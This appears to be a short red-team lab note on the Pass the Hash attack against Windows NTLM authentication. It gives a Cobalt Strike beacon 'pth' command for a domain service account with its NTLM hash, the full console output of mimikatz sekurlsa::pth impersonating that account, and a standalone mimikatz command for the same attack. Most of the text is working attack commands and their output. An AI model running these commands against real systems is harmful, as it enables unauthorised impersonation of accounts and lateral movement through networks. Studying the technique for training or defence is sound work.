Pass the Hash (PtH)
It is an attack that lets us authenticate to Windows systems using the NTLM hash of a user's password instead of the plaintext password.
pth PAY\sqlsvc 32918fbec63cc3c7c83a8c3c9787842c
This passes the token over a named pipe to the beacon and impersonates it automatically.
[02/27 06:14:07] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:"sqlsvc" /domain:"PAY" /ntlm:32918fbec63cc3c7c83a8c3c9787842c /run:"%COMSPEC% /c echo 16ed02714a8 > \\.\pipe\30cbe3" command
[02/27 06:14:09] [+] host called home, sent: 313695 bytes
[02/27 06:14:10] [+] Impersonated PAY\sqlsvc
[02/27 06:14:10] [+] received output:
user : sqlsvc
domain : PAY
program : C:\Windows\system32\cmd.exe /c echo 16ed02714a8 > \\.\pipe\30cbe3
impers. : no
NTLM : 32918fbec63cc3c7c83a8c3c9787842c
| PID 6016
| TID 4620
| LSA Process is now R/W
| LUID 0 ; 6692080 (00000000:00661cf0)
\_ msv1_0 - data copy @ 0000022876045F90 : OK !
\_ kerberos - data copy @ 000002287CEFF168
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ *Password replace @ 000002287E3DE178 (32) -> null
This can also be done with mimikatz directly.
mimikatz sekurlsa::pth /user:"sqlsvc" /domain:"PAY" /ntlm:32918fbec63cc3c7c83a8c3c9787842c